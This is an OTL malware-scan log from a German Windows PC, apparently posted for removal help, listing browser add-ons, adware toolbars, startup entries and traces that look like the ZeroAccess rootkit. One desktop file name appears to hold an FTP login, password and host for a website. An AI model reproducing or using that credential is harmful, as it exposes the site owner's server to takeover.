[2013.02.12 14:00:46 | 000,000,000 | ---D | M] (No name found) -- C:\Users\TuS\AppData\Roaming\mozilla\Firefox\Profiles\5j2bf9y8.default\extensions
[2011.06.09 19:34:49 | 000,000,000 | ---D | M] (Microsoft .NET Framework Assistant) -- C:\Users\TuS\AppData\Roaming\mozilla\Firefox\Profiles\5j2bf9y8.default\extensions\{20a82645-c095-46ed-80e3-08825760534b}
[2011.02.18 19:26:18 | 000,000,000 | ---D | M] (HP Detect) -- C:\Users\TuS\AppData\Roaming\mozilla\Firefox\Profiles\5j2bf9y8.default\extensions\{ab91efd4-6975-4081-8552-1b3922ed79e2}
[2012.04.12 10:27:18 | 000,000,000 | ---D | M] (FireJump) -- C:\Users\TuS\AppData\Roaming\mozilla\Firefox\Profiles\5j2bf9y8.default\extensions\firejump@firejump.net
[2013.02.12 14:00:46 | 000,083,610 | ---- | M] () (No name found) -- C:\Users\TuS\AppData\Roaming\mozilla\firefox\profiles\5j2bf9y8.default\extensions\FirefoxToolbar@gutscheindoktor.de.xpi
[2012.09.13 21:26:35 | 000,698,867 | ---- | M] () (No name found) -- C:\Users\TuS\AppData\Roaming\mozilla\firefox\profiles\5j2bf9y8.default\extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}.xpi
[2011.09.05 14:10:55 | 000,002,071 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\mozilla\firefox\profiles\5j2bf9y8.default\searchplugins\{141EC851-F454-4579-9174-C9E9E1D88D64}.xml
[2011.09.05 14:10:55 | 000,002,182 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\mozilla\firefox\profiles\5j2bf9y8.default\searchplugins\{17FFFFE5-2985-4E65-A59A-5F718CA14B4E}.xml
[2011.09.05 14:10:55 | 000,001,864 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\mozilla\firefox\profiles\5j2bf9y8.default\searchplugins\{1AAA6855-731F-495F-ADA7-2516FE8EF2F7}.xml
[2013.02.08 16:39:05 | 000,000,000 | ---D | M] (No name found) -- C:\Programme\Mozilla Firefox\extensions
[2013.02.08 16:39:05 | 000,000,000 | ---D | M] (Skype extension) -- C:\Programme\Mozilla Firefox\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}
[2013.02.08 16:39:06 | 000,000,000 | ---D | M] (Java Console) -- C:\Programme\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA}
[2013.02.08 16:39:03 | 000,000,000 | ---D | M] (Hotspot Shield Helper (Please allow this installation)) -- C:\Programme\Mozilla Firefox\extensions\afurladvisor@anchorfree.com
[2013.02.08 16:39:04 | 000,000,000 | ---D | M] (Modul zur Link-Untersuchung) -- C:\Programme\Mozilla Firefox\extensions\linkfilter@kaspersky.ru_bak
[2013.02.08 16:40:09 | 000,262,552 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll
[2012.06.30 07:09:43 | 000,001,392 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\amazondotcom-de.xml
[2012.10.05 18:41:04 | 000,002,465 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml
[2012.06.30 07:09:43 | 000,001,153 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\eBay-de.xml
[2012.06.30 07:09:43 | 000,006,805 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\leo_ende_de.xml
[2012.06.30 07:09:43 | 000,001,178 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wikipedia-de.xml
[2012.06.30 07:09:43 | 000,001,105 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\yahoo-de.xml
 
O1 HOSTS File: ([2012.06.29 16:08:36 | 000,000,705 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts
O2 - BHO: (Babylon toolbar helper) - {2EECD738-5844-4a99-B4B6-146BF802613B} - C:\Programme\BabylonToolbar\BabylonToolbar\1.8.3.8\bh\BabylonToolbar.dll (Babylon BHO)
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (Skype Browser Helper) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Programme\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O2 - BHO: (Hotspot Shield Toolbar) - {c95a4e8e-816d-4655-8c79-d736da1adb6d} - C:\Programme\Hotspot_Shield\prxtbHots.dll (Conduit Ltd.)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (Hotspot Shield Class) - {F9E4A054-E9B1-4BC3-83A3-76A1AE736170} - C:\Programme\Hotspot Shield\HssIE\HssIE.dll (AnchorFree Inc.)
O3 - HKLM\..\Toolbar: (Babylon Toolbar) - {98889811-442D-49dd-99D7-DC866BE87DBC} - C:\Programme\BabylonToolbar\BabylonToolbar\1.8.3.8\BabylonToolbarTlbr.dll (Babylon Ltd.)
O3 - HKLM\..\Toolbar: (Hotspot Shield Toolbar) - {c95a4e8e-816d-4655-8c79-d736da1adb6d} - C:\Programme\Hotspot_Shield\prxtbHots.dll (Conduit Ltd.)
O3 - HKCU\..\Toolbar\WebBrowser: (Hotspot Shield Toolbar) - {C95A4E8E-816D-4655-8C79-D736DA1ADB6D} - C:\Programme\Hotspot_Shield\prxtbHots.dll (Conduit Ltd.)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [avgnt] C:\Program Files\Avira\AntiVir Desktop\avgnt.exe (Avira Operations GmbH & Co. KG)
O4 - HKLM..\Run: [Ocs_SM] C:\Users\TuS\AppData\Roaming\OCS\SM\SearchAnonymizer.exe (OCS)
O4 - HKLM..\Run: [SoundMAX] C:\Program Files\Analog Devices\SoundMAX\soundmax.exe (Analog Devices, Inc.)
O4 - HKLM..\Run: [Windows Defender] C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation)
O4 - HKCU..\Run: [RocketDock] C:\Program Files\RocketDock\RocketDock.exe ()
O4 - HKCU..\Run: [WMPNSCFG] C:\Programme\Windows Media Player\wmpnscfg.exe (Microsoft Corporation)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 28
O9 - Extra Button: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Programme\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O9 - Extra 'Tools' menuitem : Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Programme\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000008 [] - C:\Programme\Bonjour\mdnsNSP.dll (Apple Inc.)
O13 - gopher Prefix: missing
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_35-windows-i586.cab (Reg Error: Value error.)
O16 - DPF: {CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_35-windows-i586.cab (Java Plug-in 1.6.0_35)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_35-windows-i586.cab (Java Plug-in 10.10.2)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.2.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{AC1F1EA0-BD7D-4511-87CD-7023DBE3F1CA}: DhcpNameServer = 192.168.2.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{BEB5FB91-4729-4169-BB55-67335B073F1B}: DhcpNameServer = 8.8.8.8
O18 - Protocol\Handler\ipp\0x00000001 {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Programme\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Programme\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Programme\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Programme\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)
O24 - Desktop WallPaper: C:\Users\TuS\AppData\Roaming\Microsoft\Windows Photo Gallery\Hintergrundbild der Windows-Fotogalerie.jpg
O24 - Desktop BackupWallPaper: C:\Users\TuS\AppData\Roaming\Microsoft\Windows Photo Gallery\Hintergrundbild der Windows-Fotogalerie.jpg
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2006.09.18 22:43:36 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]
O32 - AutoRun File - [2011.02.22 17:59:49 | 000,000,000 | -H-D | M] - G:\autorun -- [ NTFS ]
O32 - Unable to obtain root file information for disk G:\
O33 - MountPoints2\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\Shell - "" = AutoRun
O33 - MountPoints2\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\Shell\AutoRun\command - "" = G:\AutoRun.exe
O33 - MountPoints2\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\Shell - "" = AutoRun
O33 - MountPoints2\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\Shell\AutoRun\command - "" = G:\AutoRun.exe
O33 - MountPoints2\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\Shell - "" = AutoRun
O33 - MountPoints2\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\Shell\AutoRun\command - "" = H:\LaunchU3.exe -a
O33 - MountPoints2\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\Shell - "" = AutoRun
O33 - MountPoints2\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\Shell\AutoRun\command - "" = H:\LaunchU3.exe -a
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
 
ActiveX: {08B0E5C0-4FCB-11CF-AAA5-00401C608500} - Java (Sun)
ActiveX: {2179C5D3-EBFF-11CF-B6FD-00AA00B4E220} - 
ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 11.0
ActiveX: {25FFAAD0-F4A3-4164-95FF-4461E9F35D51} - .NET Framework
ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll
ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack
ActiveX: {3C3901C5-3455-3E0A-A214-0B093A5070A6} - .NET Framework
ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Windows Mail\WinMail.exe" OCInstallUserConfigOE
ActiveX: {44BBA848-CC51-11CF-AAFA-00AA00B6015C} - 
ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx
ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help
ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6
ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools
ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements
ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player
ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access
ActiveX: {73FA19D0-2D75-11D2-995D-00C04F98BBC9} - Webordner
ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7
ActiveX: {7C028AF8-F614-47B3-82DA-BA94E41B1089} - .NET Framework
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\system32\ie4uinit.exe -BaseSettings
ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\system32\Rundll32.exe C:\Windows\system32\mscories.dll,Install
ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding
ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts
ActiveX: {CDD7975E-60F8-41d5-8149-19E51D6F71D0} - Windows Movie Maker v2.1
ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help
ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface
ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - C:\Windows\system32\unregmp2.exe /ShowWMP
ActiveX: >{26923b43-4d38-484f-9b9e-de460746276c} - C:\Windows\system32\ie4uinit.exe -UserIconConfig
ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iedkcs32.dll",BrandIEActiveSetup SIGNUP
 
NetSvcs: FastUserSwitchingCompatibility -  File not found
NetSvcs: Ias - C:\Windows\System32\ias.dll (Microsoft Corporation)
NetSvcs: Nla -  File not found
NetSvcs: Ntmssvc -  File not found
NetSvcs: NWCWorkstation -  File not found
NetSvcs: Nwsapagent -  File not found
NetSvcs: SRService -  File not found
NetSvcs: WmdmPmSp -  File not found
NetSvcs: LogonHours -  File not found
NetSvcs: PCAudit -  File not found
NetSvcs: helpsvc -  File not found
NetSvcs: uploadmgr -  File not found
 
 
CREATERESTOREPOINT
Restore point Set: OTL Restore Point
 
========== Files/Folders - Created Within 30 Days ==========
 
[2013.02.18 23:27:39 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\TuS\Desktop\OTL.exe
[2013.02.18 23:13:39 | 000,000,000 | ---D | C] -- C:\Users\TuS\Desktop\twentytwelve-alt
[2013.02.18 22:35:01 | 000,000,000 | ---D | C] -- C:\Users\TuS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Notepad++
[2013.02.18 22:35:01 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++
[2013.02.18 22:34:57 | 000,000,000 | ---D | C] -- C:\Users\TuS\AppData\Roaming\Notepad++
[2013.02.18 22:34:57 | 000,000,000 | ---D | C] -- C:\Program Files\Notepad++
[2013.02.08 16:39:00 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Firefox
[2013.01.29 19:19:29 | 000,000,000 | ---D | C] -- C:\Users\TuS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MP3Gain
[2013.01.29 19:19:29 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MP3Gain
[2013.01.29 19:19:25 | 000,000,000 | ---D | C] -- C:\Program Files\MP3Gain
[2013.01.24 20:59:28 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
[2013.01.24 20:59:07 | 000,000,000 | ---D | C] -- C:\Program Files\QuickTime
[2013.01.24 18:46:22 | 000,000,000 | ---D | C] -- C:\Users\TuS\AppData\Roaming\Malwarebytes
[2013.01.24 18:46:00 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes' Anti-Malware
[2013.01.24 18:45:58 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2013.01.24 18:45:55 | 000,021,104 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\System32\drivers\mbam.sys
[2013.01.24 18:45:55 | 000,000,000 | ---D | C] -- C:\Program Files\Malwarebytes' Anti-Malware
[1 C:\*.tmp files -> C:\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2013.02.18 23:30:06 | 000,000,000 | ---- | M] () -- C:\Users\TuS\Desktop\250402-ftp               H7gG74HuBg7FJ            Tus-schildgen.de
[2013.02.18 23:27:47 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\TuS\Desktop\OTL.exe
[2013.02.18 23:19:19 | 000,005,312 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
[2013.02.18 23:19:19 | 000,005,312 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
[2013.02.18 22:58:03 | 000,000,884 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2013.02.18 21:29:48 | 000,021,751 | ---- | M] () -- C:\Users\TuS\.recently-used.xbel
[2013.02.18 19:18:44 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2013.02.18 19:18:38 | 2073,313,280 | -HS- | M] () -- C:\hiberfil.sys
[2013.02.18 17:31:31 | 000,000,012 | ---- | M] () -- C:\Windows\bthservsdp.dat
[2013.02.18 14:52:59 | 000,628,742 | ---- | M] () -- C:\Windows\System32\perfh007.dat
[2013.02.18 14:52:59 | 000,595,996 | ---- | M] () -- C:\Windows\System32\perfh009.dat
[2013.02.18 14:52:59 | 000,126,260 | ---- | M] () -- C:\Windows\System32\perfc007.dat
[2013.02.18 14:52:59 | 000,104,070 | ---- | M] () -- C:\Windows\System32\perfc009.dat
[2013.02.16 21:22:17 | 000,305,904 | ---- | M] () -- C:\Windows\System32\FNTCACHE.DAT
[2013.01.27 13:11:19 | 000,068,096 | ---- | M] () -- C:\Users\TuS\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2013.01.23 22:05:03 | 000,000,496 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\burnaware.ini
[1 C:\*.tmp files -> C:\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2013.02.18 23:30:06 | 000,000,000 | ---- | C] () -- C:\Users\TuS\Desktop\250402-ftp               H7gG74HuBg7FJ            Tus-schildgen.de
[2013.02.18 21:29:48 | 000,021,751 | ---- | C] () -- C:\Users\TuS\.recently-used.xbel
[2012.10.21 13:20:44 | 000,000,496 | ---- | C] () -- C:\Users\TuS\AppData\Roaming\burnaware.ini
[2012.10.16 11:03:56 | 000,000,000 | ---- | C] () -- C:\Windows\System32\cd.dat
[2012.09.17 18:11:49 | 000,438,272 | ---- | C] () -- C:\Windows\System32\PaintX.dll
[2012.09.11 20:07:01 | 000,224,118 | ---- | C] () -- C:\Users\TuS\01108_yaquinaheadlighthouse_1280x800.jpg
[2012.06.03 16:11:50 | 000,000,021 | ---- | C] () -- C:\Users\TuS\.gtk-bookmarks
[2012.05.10 18:25:22 | 000,201,488 | ---- | C] () -- C:\Windows\System32\MACD32.DLL
[2012.05.10 18:25:22 | 000,144,144 | ---- | C] () -- C:\Windows\System32\MASE32.DLL
[2012.05.10 18:25:22 | 000,141,584 | ---- | C] () -- C:\Windows\System32\MAMC32.DLL
[2012.05.10 18:25:22 | 000,063,248 | ---- | C] () -- C:\Windows\System32\MASD32.DLL
[2012.05.10 18:25:22 | 000,033,040 | ---- | C] () -- C:\Windows\System32\MA32.DLL
[2012.04.03 11:20:55 | 000,000,403 | ---- | C] () -- C:\Windows\ODBC.INI
[2011.02.21 18:56:09 | 000,117,248 | ---- | C] () -- C:\Windows\System32\EhStorAuthn.dll
[2011.02.21 18:56:09 | 000,107,612 | ---- | C] () -- C:\Windows\System32\StructuredQuerySchema.bin
[2011.02.21 18:18:14 | 000,018,904 | ---- | C] () -- C:\Windows\System32\StructuredQuerySchemaTrivial.bin
[2011.02.19 18:56:07 | 000,017,089 | ---- | C] () -- C:\Users\TuS\AppData\Roaming\UserTile.png
[2011.02.18 17:57:29 | 000,068,096 | ---- | C] () -- C:\Users\TuS\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2011.02.18 16:50:52 | 000,001,356 | ---- | C] () -- C:\Users\TuS\AppData\Local\d3d9caps.dat
 
========== ZeroAccess Check ==========
 
[2011.11.18 21:23:34 | 000,002,048 | -HS- | M] () -- C:\Users\TuS\AppData\Local\{ff24043d-55f8-5ce9-a20a-8337d9b4b888}\@
[2011.11.18 21:23:34 | 000,000,000 | -HSD | M] -- C:\Users\TuS\AppData\Local\{ff24043d-55f8-5ce9-a20a-8337d9b4b888}\L
[2012.08.28 22:41:46 | 000,000,000 | -HSD | M] -- C:\Users\TuS\AppData\Local\{ff24043d-55f8-5ce9-a20a-8337d9b4b888}\U
[2012.08.28 22:11:24 | 000,001,712 | ---- | M] () -- C:\Users\TuS\AppData\Local\{ff24043d-55f8-5ce9-a20a-8337d9b4b888}\U\00000001.@
[2006.11.02 13:51:16 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2012.06.08 18:47:00 | 011,586,048 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2009.04.11 07:28:19 | 000,614,912 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\system32\wbem\wbemess.dll -- [2009.04.11 07:28:25 | 000,347,648 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
========== LOP Check ==========
 
[2012.11.30 14:56:09 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Babylon
[2012.05.16 18:58:18 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\DesktopIconForAmazon
[2013.02.18 23:28:31 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\FileZilla
[2013.02.18 21:29:48 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\gtk-2.0
[2011.09.05 16:12:15 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\ICQ
[2011.08.18 01:05:18 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\InfraRecorder
[2013.02.01 23:45:36 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Mp3tag
[2013.02.18 22:57:06 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Notepad++
[2011.09.05 14:10:44 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\OCS
[2011.06.09 20:22:32 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\OpenOffice.org
[2011.09.05 14:10:55 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Opera
[2011.02.19 18:56:06 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\PeerNetworking
[2012.07.02 09:05:32 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\redsn0w
[2011.07.01 11:08:57 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Scribus
[2013.01.05 15:53:20 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\TeamViewer
[2011.07.01 10:56:46 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Thunderbird
[2011.11.20 09:24:30 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Verbindungsassistent
[2012.06.29 11:29:30 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\WindSolutions
 
========== Purity Check ==========
 
 
 
========== Custom Scans ==========
 
< %SYSTEMDRIVE%\*. >
[2011.02.18 16:51:12 | 000,000,000 | -HSD | M] -- C:\$Recycle.Bin
[2012.09.06 17:40:28 | 000,000,000 | ---D | M] -- C:\Backup 05.09.2012
[2009.07.18 19:38:55 | 000,000,000 | ---D | M] -- C:\BlueByte
[2011.02.21 19:28:10 | 000,000,000 | -HSD | M] -- C:\boot
[2013.02.16 19:05:44 | 000,000,000 | -HSD | M] -- C:\Config.Msi
[2006.11.02 13:59:44 | 000,000,000 | -HSD | M] -- C:\Documents and Settings
[2009.02.05 12:28:25 | 000,000,000 | -HSD | M] -- C:\Dokumente und Einstellungen
[2008.07.12 07:16:50 | 000,000,000 | -H-D | M] -- C:\hp
[2011.02.18 17:57:39 | 000,000,000 | ---D | M] -- C:\Intel
[2012.04.04 13:49:05 | 000,000,000 | -H-D | M] -- C:\kleaner.tmp
[2012.05.21 14:38:33 | 000,000,000 | ---D | M] -- C:\LuPO
[2012.09.17 19:09:03 | 000,000,000 | ---D | M] -- C:\Meine Webseiten
[2009.02.05 16:35:24 | 000,000,000 | RH-D | M] -- C:\MSOCache
[2008.01.21 03:43:50 | 000,000,000 | ---D | M] -- C:\PerfLogs
[2013.02.18 22:34:57 | 000,000,000 | R--D | M] -- C:\Program Files
[2013.02.18 19:20:39 | 000,000,000 | -H-D | M] -- C:\ProgramData
[2009.02.05 12:28:25 | 000,000,000 | -HSD | M] -- C:\Programme
[2013.02.11 19:28:12 | 000,000,000 | ---D | M] -- C:\SPG-Verein
[2011.02.19 18:29:32 | 000,000,000 | ---D | M] -- C:\Swsetup
[2013.02.18 23:31:32 | 000,000,000 | -HSD | M] -- C:\System Volume Information
[2011.02.18 17:15:31 | 000,000,000 | -H-D | M] -- C:\System.sav
[2012.04.03 11:13:07 | 000,000,000 | ---D | M] -- C:\Temp
[2011.02.18 16:50:49 | 000,000,000 | R--D | M] -- C:\Users
[2012.12.14 09:34:41 | 000,000,000 | ---D | M] -- C:\Windows
 
< %PROGRAMFILES%\*.exe >
 
< %LOCALAPPDATA%\*.exe >
 
< %systemroot%\*. /mp /s >
 
< C:\Windows\system32\*.tsp >
[2006.11.02 10:44:49 | 000,031,744 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\hidphone.tsp
[2006.11.02 10:44:49 | 000,038,400 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\kmddsp.tsp
[2006.11.02 10:44:49 | 000,049,664 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\ndptsp.tsp
[2006.11.02 10:44:49 | 000,081,408 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\remotesp.tsp
[2009.04.11 07:27:17 | 000,280,064 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\unimdm.tsp
[2006.11.02 13:58:10 | 000,000,006 | -H-- | C] () -- C:\Windows\Tasks\SA.DAT
[2006.11.02 13:58:10 | 000,032,534 | ---- | C] () -- C:\Windows\Tasks\SCHEDLGU.TXT
[2012.06.10 19:25:39 | 000,000,884 | ---- | C] () -- C:\Windows\Tasks\Adobe Flash Player Updater.job
 
< MD5 for: AGP440.SYS  >
[2008.01.19 08:42:25 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_51b95d75\AGP440.sys
[2008.01.19 08:42:25 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_f750e484\AGP440.sys
[2008.01.19 08:42:25 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\winsxs\x86_machine.inf_31bf3856ad364e35_6.0.6001.18000_none_ba12ed3bbeb0d97a\AGP440.sys
[2008.01.19 08:42:25 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\winsxs\x86_machine.inf_31bf3856ad364e35_6.0.6002.18005_none_bbfe6647bbd2a4c6\AGP440.sys
[2006.11.02 10:49:52 | 000,053,864 | ---- | M] (Microsoft Corporation) MD5=EF23439CDD587F64C2C1B8825CEAD7D8 -- C:\Windows\System32\drivers\AGP440.sys
[2006.11.02 10:49:52 | 000,053,864 | ---- | M] (Microsoft Corporation) MD5=EF23439CDD587F64C2C1B8825CEAD7D8 -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_920a2c1f\AGP440.sys
 
